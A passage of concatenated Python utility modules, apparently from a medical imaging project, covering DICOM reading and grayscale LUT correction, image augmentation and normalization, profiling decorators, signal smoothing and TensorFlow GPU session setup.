to_bit: bit to convert to, 8 and 16 supported. Return raw array if set to -1.
floor: manually override bit conversion
ceiling: manually override bit conversion
Returns:
pixel_array: a numpy array containing the image stored in dicom file
"""
# read dicom files
ds = dicom.read_file(filepath)
# Get image numpy array
# Image dicom file is in 16 bit and needs to be converted
try:
try:
pixel_array = ds.pixel_array
except:
# pydicom cannot handle lossless jpeg
reader = sitk.ImageSeriesReader()
reader.SetFileNames([filepath])
sitk_img = reader.Execute()
pixel_array = sitk.GetArrayFromImage(sitk_img)[0, ...]
try:
if ds.PresentationLUTShape == 'INVERSE':
pixel_array = pixel_array.max() - pixel_array
except:
logging.debug('No PresentationLUTShape attribute found in the dicom header')
if to_bit == -1:
# return the raw image
return pixel_array
if floor is not None and ceiling is not None:
pixel_array = np.clip(pixel_array, a_min=floor, a_max=ceiling)
pixel_array = (pixel_array.astype(float) - floor) / (ceiling - floor) * (2 ** to_bit - 1)
if to_bit == 8:
pixel_array = pixel_array.astype(np.uint8)
elif to_bit == 16:
pixel_array = pixel_array.astype(np.uint16)
else:
raise ValueError('Unsupported bit type {}-bit!'.format(to_bit))
elif ds.BitsStored != to_bit:
print('Converting from {}-bit to {}-bit'.format(ds.BitsStored, to_bit))
pixel_array = convert_to_unit8(pixel_array, to_bit=to_bit)
except:
# Some mask has size mismatch of exactly one, then manually discard one element
try:
# all masks are stored in uint8 format
pixel_array = np.frombuffer(ds.PixelData, dtype=np.uint8).copy()
pixel_array = pixel_array[mismatch:].reshape((ds.Rows, ds.Columns))
except:
raise ValueError('The img size mismatches in {} and is not {}'.format(filepath, mismatch))
return pixel_array
def gen_single_input(single_image_path):
"""Read from image path and return a 3 channel color image in the format of numpy array
Args:
single_image_path:
Returns:
img_color: a 3 channel numpy array
"""
filepath = single_image_path
img = plt.imread(filepath) * 255
img = img.astype(np.float32)
# shenzhen dataset has 3 channels
if len(img.shape) == 3:
img_color = img
# some nih png file has four channels RGBA
# e.g., '/data/dataset/images/images_003/00006074_000.png'
# use first 3 channels RGB only
if img.shape[-1] == 4:
img_color = img[:, :, :3]
# most nih dataset has single grayscale channel
elif len(img.shape) == 2:
img_color = np.dstack([img] * 3)
return img_color
def input_generator(filepath_list=[], dirname=None):
"""
Yield a generator of image numpy array and the corresponding filepath
Args:
filepath_list:
dirname:
Yields:
img_color:
filepath
"""
if not filepath_list and dirname:
print('******* dirname specified!')
filepath_list = [os.path.join(dirname, filename)
for filename in os.listdir(dirname) if filename.endswith('.png')]
for filepath in filepath_list:
img_color = gen_single_input(filepath)
img_color = np.reshape(img_color, [-1])
print('************* Input image array:')
print([pix for pix in img_color[:100]])
yield img_color, filepath
def diff_df(df1, df2):
"""Identify differences between two pandas DataFrames"""
assert (df1.columns == df2.columns).all(), "DataFrame column names are different"
if any(df1.dtypes != df2.dtypes):
"Data Types are different, trying to convert"
df2 = df2.astype(df1.dtypes)
if df1.equals(df2):
return None
else:
# need to account for np.nan != np.nan returning True
diff_mask = (df1 != df2) & ~(df1.isnull() & df2.isnull())
ne_stacked = diff_mask.stack()
changed = ne_stacked[ne_stacked]
changed.index.names = ['id', 'col']
difference_locations = np.where(diff_mask)
changed_from = df1.values[difference_locations]
changed_to = df2.values[difference_locations]
return pd.DataFrame({'from': changed_from, 'to': changed_to},
index=changed.index)
def concat_df(input_csv_path_list, output_csv_path=None):
"""Concatenate csv files and return the combined dataframe
Args:
input_csv_path_list:
output_csv_path:
Returns:
"""
df_all = None
for csv_path in input_csv_path_list:
df = pd.read_csv(csv_path)
print('{}: length {}'.format(csv_path, len(df)))
try:
df_all = pd.concat([df_all, df])
except:
df_all = df
if output_csv_path:
df_all.to_csv(output_csv_path, index=False)
print('concatenated df length {}'.format(len(df_all)))
return df_all
<file_sep>"""This file contains utility functions used for numpy-based input augmentation
TODO: make more general for 3D images
"""
import logging
import cv2
import random
import scipy.ndimage
from skimage.filters import threshold_otsu, gaussian
try:
import dicom
except:
import pydicom as dicom
import numpy as np
from io import BytesIO
from skimage.morphology import erosion, square, disk
from skimage import measure
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def apply_mirroring(data, labels):
"""
Apply mirroring to left, right, top, and bottom
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Mirrored data and labels
"""
data_shape = data.shape[0:2]
data = np.lib.pad(data, ((data_shape[0]-1, data_shape[0]-1), (data_shape[1]-1, data_shape[1]-1)), 'reflect')
labels = np.lib.pad(labels, ((data_shape[0]-1, data_shape[0]-1), (data_shape[1]-1, data_shape[1]-1), (0, 0)), 'reflect')
return data, labels
def random_rotation(data, labels):
"""
Perform random rotation on data and labels
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Rotated data and labels
"""
angle_deg = random.uniform(-180.0, 180.0)
data = scipy.ndimage.interpolation.rotate(data, angle_deg, reshape=False)
labels = scipy.ndimage.interpolation.rotate(labels, angle_deg, reshape=False)
return data, labels
def random_flip_left_right(data, labels):
"""
Perform random flip left and right on data and labels
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Randomly flipped data and labels
"""
flip = bool(random.getrandbits(1))
if flip:
data = np.fliplr(data)
labels = np.fliplr(labels)
return data, labels
def get_next_dividable_shape(input_shape, block_shape):
"""Get the minimum new_shape >= shape that is dividable by block_shape
Args:
input_shape: original shape
block_shape: shape to be multiples of. Can be scalar, or a list with the same shape as input_shape
Returns:
new_shape
"""
input_shape = np.array(input_shape)
block_shape = np.array(block_shape)
residual_shape = input_shape - (input_shape // block_shape) * block_shape
# if residual_shape == (0, 0), do not change shape
new_shape = input_shape + (block_shape - residual_shape) % block_shape
return new_shape
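# Editor's example (illustrative only): get_next_dividable_shape rounds each dimension up to
# the next multiple of block_shape, while dimensions that are already multiples are unchanged.
def _example_get_next_dividable_shape():
    # 1000 -> 1024 and 1250 -> 1280 when the block size is 64
    new_shape = get_next_dividable_shape((1000, 1250), 64)
    assert np.array_equal(new_shape, [1024, 1280])
    return new_shape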
def crop_or_pad(image_array, target_shape):
"""Crop or pad image_array to target_shape
Use the top left corner (0, 0) as anchor and only pad or crop in the bottom right corner.
NB: this only works for 2D for now
Args:
image_array:
target_shape:
Returns:
"""
dtype = image_array.dtype
source_shape = image_array.shape[:2]
target_shape = target_shape[:2]
if tuple(source_shape) == tuple(target_shape):
return image_array
max_shape = tuple(np.max([source_shape, target_shape], axis=0).astype(np.int))
image_array_new = np.zeros(max_shape, dtype=dtype)
image_array_new[:source_shape[0], :source_shape[1]] = image_array
image_array_new = image_array_new[:target_shape[0], :target_shape[1]]
assert tuple(image_array_new.shape) == tuple(target_shape)
return image_array_new
def center_pad(image, target_shape, mode='constant'):
"""Pad image symmetrically to target_shape
Args:
image: input np array
target_shape: final shape
mode: np.pad mode
"""
target_shape = np.asarray(target_shape)
source_shape = np.array(image.shape)
# top/left padding and bottom/right padding
padding_1 = (target_shape - source_shape) // 2
padding_2 = (target_shape - source_shape) - (target_shape - source_shape) // 2
image = np.pad(image, list(zip(padding_1, padding_2)), mode=mode)
assert image.shape == tuple(target_shape)
return image
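# Editor's example (illustrative only): center_pad splits the required padding between the two
# sides, giving the top/left side the smaller half when the difference is odd.
def _example_center_pad():
    image = np.zeros((5, 8))
    padded_even = center_pad(image, (9, 12))   # 2 rows/columns added on every side
    padded_odd = center_pad(image, (8, 11))    # 1 row/col on top/left, 2 on bottom/right
    return padded_even.shape, padded_odd.shape  # (9, 12) and (8, 11)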
def center_crop(data, crop_shape, labels=None):
"""
Perform random cropping after optional padding
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (unique values limited to (0, 1)), could be None
crop_shape: target shape after cropping
Returns:
Randomly cropped data and labels
"""
data_shape = data.shape[0:2]
assert (crop_shape[0] <= data_shape[0])
assert (crop_shape[1] <= data_shape[1])
nh = int((data_shape[0] - crop_shape[0]) / 2)
nw = int((data_shape[1] - crop_shape[1]) / 2)
data = data[nh:nh + crop_shape[0], nw:nw + crop_shape[1]]
if labels is not None:
labels = labels[nh:nh + crop_shape[0], nw:nw + crop_shape[1], :]
return data, labels
return data
def center_crop_or_pad(image, target_shape, mode='constant'):
"""Center crop or pad to target_shape
Only works for 2D images
Args:
image:
target_shape:
mode:
Returns:
"""
pad_target_shape = np.maximum(np.array(target_shape)[:2], image.shape[:2])
image = center_pad(image, target_shape=pad_target_shape, mode=mode)
image = center_crop(image, crop_shape=target_shape)
return image
def crop_around_point(image_array, center_yx, target_shape):
"""Center crop an image array around a point
Args:
image_array:
center_yx:
target_shape:
Returns:
"""
pad_y, pad_x = ((np.array(target_shape) + 1) // 2).astype(np.int)
pad_width = ((pad_y, pad_y), (pad_x, pad_x))
image_array = np.pad(image_array, pad_width=pad_width, mode='constant')
ymin, xmin = (np.array(center_yx) + np.array([pad_y, pad_x]) - np.array(target_shape) // 2).astype(np.int)
ymax, xmax = (np.array([ymin, xmin]) + np.array(target_shape)).astype(np.int)
cropped_array = image_array[ymin:ymax, xmin:xmax]
assert cropped_array.shape == tuple(target_shape)
return cropped_array
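# Editor's example (illustrative only): crop_around_point zero-pads before cropping, so a
# fixed-size patch can be taken around a point even when it lies close to the image border.
def _example_crop_around_point():
    image = np.arange(100 * 100).reshape(100, 100)
    patch = crop_around_point(image, center_yx=(5, 5), target_shape=(64, 64))
    # the part of the 64x64 window that falls outside the original image is zero-filled
    return patch.shape  # (64, 64)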
def random_crop(data, labels, crop_shape, padding=None):
"""
Perform random cropping after optional padding
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
crop_shape: target shape after cropping
padding: how many pixels to pad before cropping
Returns:
Randomly cropped data and labels
"""
data_shape = data.shape[0:2]
if padding:
data_shape = (data_shape[0] + 2 * padding, data_shape[1] + 2 * padding)
npad_data = ((padding, padding), (padding, padding))
npad_labels = ((padding, padding), (padding, padding), (0, 0))
data = np.lib.pad(data, pad_width=npad_data, mode='constant', constant_values=0)
labels = np.lib.pad(labels, pad_width=npad_labels, mode='constant', constant_values=0)
nh = random.randint(0, data_shape[0] - crop_shape[0])
nw = random.randint(0, data_shape[1] - crop_shape[1])
data = data[nh:nh + crop_shape[0], nw:nw + crop_shape[1]]
labels = labels[nh:nh + crop_shape[0], nw:nw + crop_shape[1], :]
return data, labels
def random_resize(data, labels):
"""Perform random resizing
Args:
data: data array representing 1 image [h, w]
labels: labels array [h, w, 2] (alphabet limited to (0, 1))
Returns:
Randomly resized data and labels, potentially with different shape
"""
data_shape = data.shape[0:2]
resize_ratio = np.random.uniform(low=1.0, high=1.2, size=2)
data = scipy.ndimage.interpolation.zoom(input=data, zoom=resize_ratio)
labels = scipy.ndimage.interpolation.zoom(input=labels, zoom=np.append(resize_ratio, 1.0))
labels = np.around(labels)
return data, labels
def resize(image, scale=None, dst_shape=(0, 0), interpolation=None):
"""Customize resize wrapper of cv2.resize
Automatically select best interpolation method.
Note: Pay special attention to the x and y dimension. Numpy uses (y, x) order but openCV
uses (x, y) order.
Args:
image:
scale:
dst_shape: (x, y) order
interpolation:
"""
src_shape = np.asarray(image.shape) # in the order of (y, x, ...)
src_shape = src_shape[:2][::-1] # get the first two dimension and flip them
if scale is not None:
dst_shape = (src_shape * scale).astype(np.int)
else:
dst_shape = np.asarray(dst_shape).astype(np.int)
if interpolation is None:
if (scale is not None and scale >= 1) or np.any(dst_shape > src_shape):
interpolation = cv2.INTER_LINEAR
else:
interpolation = cv2.INTER_AREA
image_resized = cv2.resize(image, tuple(dst_shape), interpolation=interpolation)
return image_resized
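# Editor's example (illustrative only): the resize wrapper takes scale or dst_shape in
# (x, y) order while numpy shapes are (y, x); a (480, 640) array (height 480, width 640)
# halved with scale=0.5 therefore comes back with shape (240, 320).
def _example_resize_axis_order():
    image = np.zeros((480, 640), dtype=np.uint8)
    half = resize(image, scale=0.5)              # downscaling selects cv2.INTER_AREA
    fixed = resize(image, dst_shape=(320, 240))  # dst_shape is (x, y) for cv2
    return half.shape, fixed.shape               # both (240, 320)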
def soft_rescale(data):
"""Soft scale data back to [0, 1]
If data is in [0, 1], do nothing. Otherwise, scale the side outside this bound back to [0, 1]
Args:
data:
Returns:
"""
a_max = max(data.max(), 1)
a_min = min(data.min(), 0)
data = (data - a_min) / (a_max - a_min)
return data
def random_brightness(data, labels, max_delta=0.2):
"""Perform random brightness adjustment. Add a random number to the image
Args:
data: a float array in [0, 1]
labels:
max_delta: maximum adjustment, in [-1, 1]
Returns:
"""
delta = np.random.uniform(low=-max_delta, high=max_delta)
data = data + delta
# scale back to [0, 1]
data = soft_rescale(data)
return data, labels
def random_contrast(data, labels, lower=0.8, upper=1.2):
"""Perform random contrast adjustment for 2d images
For each `x` pixel in a channel, `(x - mean) * contrast_factor + mean`.
Args:
data: numpy array with values in [0, 1]
labels:
lower: lower bound of contrast adjustment, [0, 1]
upper: upper bound of contrast adjustment, [1, inf]
Returns:
"""
contrast_factor = np.random.uniform(low=lower, high=upper)
mean = data.mean()
data = (data - mean) * contrast_factor + mean
# scale back to [0, 1]
data = soft_rescale(data)
return data, labels
def pad(image_array, padding=(0, 0)):
"""Pad image with zero
Args:
image_array:
padding:
Returns:
"""
shape = np.array(image_array.shape)
padding = np.asarray(padding)
new_shape = shape + 2 * padding
image_array_padded = np.zeros(new_shape)
image_array_padded[padding[0]:(shape[0] + padding[0]), padding[1]:(shape[1] + padding[1])] = image_array
return image_array_padded
def normalize(image_array, a_min=-np.inf, a_max=np.inf,
how='extend', lower_sigma=3, upper_sigma=6, bg_thresh=None, force_otsu=False):
"""Clip image and then normalize to [0, 1]
Args:
image_array: the input numpy array
a_min:
a_max:
lower_sigma:
upper_sigma:
bg_thresh:
how: the method to normalize, can be `optimize` or `extend`
`optimize`: use automatic histogram normalization to optimize contrast
`extend`: clip image and extend max to 1 and min to 0
Returns:
"""
image_array = image_array.astype(np.float)
if how == 'optimize':
image_array = normalize_auto(image_array, lower_sigma=lower_sigma, upper_sigma=upper_sigma,
bg_thresh=bg_thresh, force_otsu=force_otsu)
elif how == 'extend':
if 0 < a_min < 1 and 0 < a_max < 1:
if bg_thresh:
image_array_fg = image_array[image_array > bg_thresh]
a_max = np.percentile(image_array_fg, a_max)
a_min = np.percentile(image_array_fg, a_min)
image_array = np.clip(np.fabs(image_array), a_min, a_max)
image_array -= np.amin(image_array)
if np.amax(image_array) == 0:
# uniform image
return np.ones_like(image_array)
image_array /= np.amax(image_array)
elif how == 'raw':
image_array /= 255
else:
raise ValueError('Unknown option {}'.format(how))
return image_array
def normalize_auto(image_array, lower_sigma=2, upper_sigma=4, bg_thresh=None, bg_percentile=20, force_otsu=False):
"""Clip mammo to appropriate window
Note: goals of this auto normalization algorithm:
1. Set background to 0
2. Maximize contrast while discarding minimum information
3. Applying this function twice should yield the same results, i.e., this function should be idempotent,
f(f(x)) = f(x). https://en.wikipedia.org/wiki/Idempotence#Unary_operation
Args:
image_array: the input numpy array
bg_thresh: ignore pixel values < bg_thresh when computing the foreground statistics
lower_sigma: number of robust standard deviations below the mean that is mapped to 0
upper_sigma: number of robust standard deviations above the mean that is mapped to 1
bg_percentile: percentile used to decide whether the background is already 0
force_otsu: boolean, if True always use Otsu thresholding to find bg_thresh
Returns:
image_array_clipped: a numpy array with range [0, 1]
"""
# select the fg pixels
image_array = image_array.astype(np.float)
if not bg_thresh:
# if 20 pct is 0, then background is 0, set bg_thresh = 0; otherwise use otsu to find bg_thresh
if not force_otsu and np.percentile(image_array, bg_percentile) == 0:
bg_thresh = 0
else:
bg_thresh = threshold_otsu(image_array)
print('background threshold {}'.format(bg_thresh))
image_array_fg = image_array[image_array > bg_thresh]
# select 5 pct to 95 pct to perform robust normalization
pct_5 = np.percentile(image_array_fg, 5)
pct_95 = np.percentile(image_array_fg, 95)
image_array_fg_robust = image_array_fg[(image_array_fg > pct_5) & (image_array_fg < pct_95)]
std = np.std(image_array_fg_robust)
mean = np.mean(image_array_fg_robust)
# set (mean - lower_sigma * std) to 0, and (mean + upper_sigma * std) to 1
a_min = mean - lower_sigma * std
a_max = mean + upper_sigma * std
# set bg pixels to a_min. Sometimes bg_threshold > a_min
image_array[image_array <= bg_thresh] = a_min
# clip
image_array_clipped = np.clip(image_array, a_min=a_min, a_max=a_max)
image_array_clipped = (image_array_clipped - a_min) / (a_max - a_min)
return image_array_clipped
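# Editor's example (illustrative only, synthetic data): normalize_auto maps the background to 0
# and stretches the robust foreground window to [0, 1].
def _example_normalize_auto():
    rng = np.random.RandomState(0)
    image = np.zeros((100, 100))
    image[25:75, 25:75] = rng.uniform(1000, 3000, size=(50, 50))  # synthetic foreground region
    normalized = normalize_auto(image)
    # background stays 0 and foreground lies in [0, 1]; applying the function again should give
    # (approximately) the same result, per the idempotence goal stated in the docstring
    return normalized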
def binary_mask_to_probability_mask(image_array, ero_factor=4, blur_factor=12):
"""Convert binary mask to probability
Erode first and then blur with a Gaussian kernel to largely constrain non-zero values within the original mask
Args:
image_array:
ero_factor: erosion kernel size is 1/ero_factor of mask size (geometric averaged size)
blur_factor: blurring kernel size is 1/blur_factor of mask size (two dimensional size)
Returns:
"""
assert len(np.unique(image_array)) <= 2, 'input is not binary array!'
assert np.max(image_array) <= 1
x, y = np.where(image_array == np.max(image_array))
xmin, xmax = min(x), max(x)
ymin, ymax = min(y), max(y)
size = np.asarray([xmax - xmin, ymax - ymin])
if ero_factor:
erosion_size = int(np.sqrt(size[0] * size[1]) / ero_factor)
image_array = dilate(image_array, -erosion_size)
if blur_factor:
image_array = gaussian(image_array, sigma=size / blur_factor)
return image_array
def dilate(binary_array, dilation_kernel_size):
"""
Args:
binary_array:
dilation_kernel_size: an integer. Erode if negative, dilate if positive.
This kernel size is diameter
Returns:
Dilated or eroded binary array
"""
if dilation_kernel_size == 0:
return binary_array
if dilation_kernel_size < 0:
dilation_kernel_size = -dilation_kernel_size
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
else:
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = binary_array.astype(np.bool)
return binary_array
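# Editor's example (illustrative only): the sign convention of dilate -- a positive kernel size
# dilates the mask, a negative kernel size erodes it.
def _example_dilate_sign_convention():
    mask = np.zeros((7, 7), dtype=np.uint8)
    mask[3, 3] = 1
    grown = dilate(mask, 3)    # the single pixel grows into a 3x3 block
    shrunk = dilate(grown, -3) # eroding with the same kernel shrinks it back to the centre pixel
    return grown, shrunk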
def clean_bg_component(prob_array, threshold=0.5, anchor_patch=10):
"""Keep the central connected component and set the rest of the pixels to 0
Note that the current algorithm requires that the central patch overlaps a foreground component; otherwise the input is returned unchanged.
Args:
prob_array: a probability array with values between 0 and 1
anchor_patch: collect all non-zero labels in this center patch and find connected component.
Sometimes the center of the patch does not lie in any foreground connected component mask,
and this serves as a temporary solution.
Returns:
masked_prob_array: the masked prob array
"""
binary_array = prob_array > threshold
labeled_mask_array = measure.label(binary_array, connectivity=2)
y_c, x_c = np.array(binary_array.shape) // 2
central_component_idx = np.unique(
labeled_mask_array[(y_c - anchor_patch // 2):(y_c + anchor_patch // 2),
(x_c - anchor_patch // 2):(x_c + anchor_patch // 2)])
central_component_idx = [x for x in central_component_idx if x]
center_mask = np.zeros_like(binary_array)
if not central_component_idx:
# If cannot find central connected component, return the original input
return prob_array, labeled_mask_array
for idx in central_component_idx:
center_mask[labeled_mask_array == idx] = 1
masked_prob_array = prob_array * center_mask
return masked_prob_array, labeled_mask_array
def opening(binary_array, open_kernel_size):
"""
Args:
binary_array:
open_kernel_size(int): Closing if negative, opening if positive
Returns:
"""
if open_kernel_size == 0:
return binary_array
if open_kernel_size < 0:
open_kernel_size = -open_kernel_size
kernel = np.ones((open_kernel_size, open_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
else:
kernel = np.ones((open_kernel_size, open_kernel_size), np.uint8)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = binary_array.astype(np.bool)
return binary_array
class DicomCorrector(object):
def __init__(self, dicom_path, level):
"""Correct dicom grayscale according to LUT
Ref: http://dicom.nema.org/medical/dicom/2017a/output/chtml/part03/sect_C.11.html
There are 3 stages (transforms) within the DICOM rendering pipeline with regard to applying lookup tables that
can alter input values for rendering. Used within these stages are 4 types of lookup table (LUT) that can be
found within DICOM images as part of the standard, plus one further type which exists in DicomObjects. Together
with a number of other pixel data modifiers, these are used within the pipeline to produce a flexible
rendering chain.
Args:
dicom_path:
level: gamma correction levels, could be `softer`, `normal` or `harder`
"""
self._dicom_path = dicom_path
try:
self._ds = dicom.read_file(dicom_path)
self._image_array = self._ds.pixel_array
except:
print("Dicom reading error")
# Add preamble manually
fp = BytesIO()
fp.write(b'\x00' * 128)
fp.write(b'DICM')
# Add the contents of the file
f = open(dicom_path, 'rb')
fp.write(f.read())
f.close()
fp.seek(0)
# Read the dataset:
self._ds = dicom.read_file(fp, force=True)
import pydicom.uid
self._ds.file_meta.TransferSyntaxUID = dicom.uid.ImplicitVRLittleEndian # or whatever is the correct transfer syntax for the file
self._image_array = self._ds.pixel_array
self._level = level
# original array before correction
self._raw_array = self._image_array.copy()
@staticmethod
def look_up_value(lut_sequence, image_array, level):
"""
Args:
lut_sequence: a LUT sequence, e.g. the Modality LUT or VOI LUT sequence
image_array(np.array): pixel array to transform
level: gamma correction level, e.g. `softer`, `normal` or `harder`
Returns:
"""
for i in range(lut_sequence.VM):
lut_descriptor = lut_sequence[i][0x28, 0x3002].value
lut_explanation = lut_sequence[i][0x28, 0x3003].value
lut_data = lut_sequence[i][0x28, 0x3006].value
num_entries = lut_descriptor[0]
offset = lut_descriptor[1]
if lut_explanation.lower() == level.lower():
image_array = np.clip(image_array, offset, num_entries + offset - 1)
image_array = image_array - offset
lut = np.asarray(lut_data)
image_array = lut[image_array.astype(int)]
return image_array
def voi_lut_windowing(self, win_center, win_width, fun_type="linear"):
"""VOI LUT function is LINEAR
Args:
win_center:
win_width:
fun_type:
Returns:
"""
assert fun_type.lower() in ['linear', 'sigmoid', 'linear_exact']
print('Using windowing type `{}`'.format(fun_type))
if fun_type.lower() == "linear":
lower_bound = win_center - 0.5 - (win_width - 1) / 2
upper_bound = win_center - 0.5 + (win_width - 1) / 2
self._image_array[self._image_array <= lower_bound] = lower_bound
self._image_array[self._image_array > upper_bound] = upper_bound
self._image_array[(self._image_array > lower_bound) * (self._image_array <= upper_bound)] = \
((self._image_array[(self._image_array > lower_bound) * (self._image_array <= upper_bound)]
- (win_center - 0.5)) / (win_width - 1) + 0.5) * (upper_bound - lower_bound) + lower_bound
elif fun_type.lower() == "sigmoid":
bits_stored = self._ds[0x28, 0x101].value
output_range = 2**bits_stored
self._image_array = output_range / (1 + np.exp(-4 * (self._image_array - win_center) / win_width))
elif fun_type.lower() == "linear_exact":
lower_bound = win_center - win_width / 2
upper_bound = win_center + win_width / 2
self._image_array[self._image_array <= lower_bound] = lower_bound
self._image_array[self._image_array > upper_bound] = upper_bound
in_window = (self._image_array > lower_bound) * (self._image_array <= upper_bound)
self._image_array[in_window] = \
(self._image_array[in_window] - win_center) / win_width * (upper_bound - lower_bound) + lower_bound
def modality_lut(self):
"""This function transforms the manufacturer dependent pixel values into pixel values which are meaningful for
the modality and which are manufacturer independent.
Returns:
"""
try:
modality_lut_sequence = self._ds[0x28, 0x3000]
self._image_array = DicomCorrector.look_up_value(modality_lut_sequence, self._image_array, self._level)
except:
try:
print("Use rescaling to do the modality lut")
intercept = self._ds[0x28, 0x1052].value
slope = self._ds[0x28, 0x1053].value
self._image_array = self._image_array * slope + intercept
except:
print("Unable to do the modaligy lut", self._dicom_path)
def voi_lut(self):
"""The Value Of Interest(VOI) LUT transformation transforms the modality pixel values into pixel values which
are meaningful for the user or the application.
Args:
level:
Returns:
"""
try:
voi_lut_sequence = self._ds[0x28, 0x3010]
self._image_array = DicomCorrector.look_up_value(voi_lut_sequence, self._image_array, self._level)
except:
print("Render the gray scale into window")
try:
win_center_list = self._ds[0x28, 0x1050].value
win_width_list = self._ds[0x28, 0x1051].value
if self._ds[0x28, 0x1051].VM == 1:
win_center = win_center_list
win_width = win_width_list
else:
zipped = zip(win_width_list, win_center_list)
zipped_sorted = sorted(zipped, key=lambda t: t[0])
if self._level.lower() == "softer":
win_center = zipped_sorted[0][1]
win_width = zipped_sorted[0][0]
elif self._level.lower() == "normal":
win_center = zipped_sorted[1][1]
win_width = zipped_sorted[1][0]
elif self._level.lower() == "harder":
win_center = zipped_sorted[2][1]
win_width = zipped_sorted[2][0]
else:
raise KeyError("Input level error, should be softer, normal or harder")
print('Level `{}` not found'.format(self._level))
try:
function_type = self._ds[0x28, 0x1056]
self.voi_lut_windowing(win_center, win_width, function_type)
except:
self.voi_lut_windowing(win_center, win_width)
except:
print("Unable to do the voi lut", self._dicom_path)
def presentation_lut(self):
"""The Presentation LUT transformation transforms the pixel values into P-Values, a device independent perceptually
linear space.
Returns:
"""
try:
presentation_lut_shape = self._ds[0x2050, 0x0020].value
if presentation_lut_shape.lower() == "invert" or presentation_lut_shape.lower() == "inverse":
self._image_array = np.max(self._image_array) - self._image_array
except:
print("Use photometric interpretation to check invert", self._dicom_path)
try:
photometric_interpretation = self._ds[0x28, 0x4].value
if photometric_interpretation == "MONOCHROME1":
self._image_array = np.max(self._image_array) - self._image_array
except:
print("Unable to do the presentation lut", self._dicom_path)
def correct(self):
"""The main function to correct dicom pixel_value error.
Returns:
"""
try:
self.modality_lut()
self.voi_lut()
self.presentation_lut()
return self._image_array
except:
print("Correction Error", self._dicom_path)
<file_sep>"""This script documents useful decorators"""
import logging
import time
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')
def clock(func):
"""Decorator for profiling purpose"""
def clocked(*args, **kwargs):
t0 = time.time()
result = func(*args, **kwargs)
elapsed = time.time() - t0
name = func.__name__
arg_str = ', '.join(repr(arg) for arg in args)
# print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))
print('[%0.8fs] %s -> %r' % (elapsed, name, result))
return result
return clocked
def dump_func_name(func):
"""This decorator prints out function name when it is called
Args:
func:
Returns:
"""
def echo_func(*func_args, **func_kwargs):
logging.debug('### Start func: {}'.format(func.__name__))
return func(*func_args, **func_kwargs)
return echo_func
def clock_test():
@dump_func_name
@clock
def fibonacci(n):
if n < 2:
return n
return fibonacci(n - 2) + fibonacci(n - 1)
print(fibonacci(6))
if __name__ == '__main__':
clock_test()<file_sep>"""Functions for 1d signal processing"""
import numpy as np
import scipy.signal
def smooth_mean(y, window=11, mode='valid'):
box = np.ones(window) / window
if mode == 'valid':
y = np.pad(y, pad_width=(window)//2, mode='reflect')
y_smooth = np.convolve(y, box, mode=mode)
return y_smooth
def smooth_med(y, window=11):
y_smooth = scipy.signal.medfilt(y, kernel_size=window)
return y_smooth
def my_smooth(y, window=11):
y_smooth = smooth_mean(smooth_med(y, window=window))
return y_smooth<file_sep>import os
import json
from projects.drutils import fileio
from projects.drutils.tf_utils import FlagsObjectView
from distutils.version import StrictVersion
import tensorflow as tf
import tensorflow.contrib.image
def setup_gpu(cuda_device_id):
# Set up GPU device
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ['CUDA_VISIBLE_DEVICES'] = str(cuda_device_id)
def set_session_keras(allow_growth=True, log_device_placement=False, fraction=0.8):
"""Set default (global) session for keras
Args:
allow_growth:
log_device_placement:
Returns:
None
"""
import tensorflow as tf
import keras
config = tf.ConfigProto()
# Allow GPU growth
config.gpu_options.allow_growth = allow_growth # dynamically grow the memory used on the GPU
config.gpu_options.per_process_gpu_memory_fraction = fraction
# Log device placement (on which device the operation ran)
# (nothing gets printed in Jupyter, only if you run it standalone)
config.log_device_placement = log_device_placement
sess = tf.Session(config=config)
keras.backend.tensorflow_backend.set_session(sess) # set this TensorFlow session as the default session for Keras
def get_session_tf(allow_growth=True, log_device_placement=False, fraction=1.0):
"""Get a well-behaved session for tensorflow
Usage:
Replace the normal
```
with tf.Session() as sess:
# run graph
```
with
```
with gpu.get_session_tf() as sess:
# run graph
```
Args:
allow_growth:
log_device_placement:
Returns:
sess: a configured tf session
"""
import tensorflow as tf
# Allow GPU growth
config = tf.ConfigProto()
# Allow GPU growth
config.gpu_options.allow_growth = allow_growth # dynamically grow the memory used on the GPU
config.gpu_options.per_process_gpu_memory_fraction = fraction
# Log device placement (on which device the operation ran)
# (nothing gets printed in Jupyter, only if you run it standalone)
config.log_device_placement = log_device_placement
sess = tf.Session(config=config)
return sess
def log_flags(flags, logdir, log_name='config.json'):
"""Log tf FLAGS to json"""
fileio.maybe_make_new_dir(logdir)
config_log = os.path.join(logdir, log_name)
if flags is None:
config_dict = {}
else:
# for tensorflow 1.5 and above
if StrictVersion(tf.__version__) >= StrictVersion('1.5.0'):
flags = FlagsObjectView(flags)
config_dict = flags.__dict__
with open(config_log, 'w') as f:
json.dump(config_dict, f, indent=1, sort_keys=True)
def load_graph_ckpt(filepath, gpu_memory_fraction=1.0):
"""Load model from tensorflow ckpt file
There should be 3 files starting with `filepath`
.meta (contains the graph)
.index
.data (contains the weight)
"""
    sess = get_session_tf(fraction=gpu_memory_fraction)
saver = tf.train.import_meta_graph(filepath + '.meta')
saver.restore(sess, filepath)
print('Graph loaded from ckpt.')
return sess
def load_new_graph_ckpt(filepath, gpu_memory_fraction=1.0):
